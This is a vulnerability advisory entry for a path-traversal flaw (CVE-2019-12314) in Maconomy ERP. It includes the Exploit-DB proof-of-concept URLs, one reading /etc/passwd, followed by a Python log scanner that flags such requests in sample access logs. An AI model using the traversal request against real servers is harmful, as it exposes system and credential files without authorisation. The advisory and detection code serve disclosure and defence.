vendor: Maconomy ERP
by: JameelNabbo
CVSS: 9.8 CRITICAL
Local File Inclusion (LFI)
CWE: 22
Product Name: Maconomy ERP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CVE: CVE-2019-12314
CPE: a:deltek:maconomy
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2019

Maconomy Erp local file include

Maconomy ERP is vulnerable to Local File Inclusion (LFI). An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to read sensitive files from the server, such as the /etc/passwd file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the web application is properly configured to prevent directory traversal attacks. Additionally, the web server should be configured to deny requests to files outside of the web root directory.

Exploit-DB raw data:

# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
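
One way to look for this request shape in web server access logs, added here as an example and not part of the Exploit-DB entry or Deltek's code. It assumes combined-format access logs; the sample lines, the function names and the heuristic (an absolute path or a dot-dot segment after the endpoint name) are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Endpoint name taken from the PoC URLs on this page.
ENDPOINT = "maconomyws.macx1.w_mcs"
# Request field of a combined-format access log line (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2019:10:00:01 +0000] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 200 1532',
    '192.0.2.11 - - [22/May/2019:10:00:05 +0000] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/%2Fetc%2Fpasswd HTTP/1.1" 200 1532',
    '192.0.2.12 - - [22/May/2019:10:00:09 +0000] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/ HTTP/1.1" 200 812',
    '192.0.2.13 - - [22/May/2019:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 4096',
]

def normalise(path, rounds=3):
    """Percent-decode until stable so encoded slashes and dots are compared literally."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def classify(line):
    """Return a reason string if the request matches the reviewed shape, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path = normalise(m.group(1).split("?", 1)[0])
    idx = path.lower().find(ENDPOINT)
    if idx == -1:
        return None
    tail = path[idx + len(ENDPOINT):]
    if tail.startswith("//"):
        return "absolute path after endpoint"
    if ".." in tail.split("/"):
        return "dot-dot segment after endpoint"
    return None

def scan(lines):
    """Return (source_ip, reason) for every flagged line."""
    return [(l.split()[0], r) for l in lines if (r := classify(l))]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

A 200 response on a flagged line is the case to triage first, since it indicates the server returned content for the request.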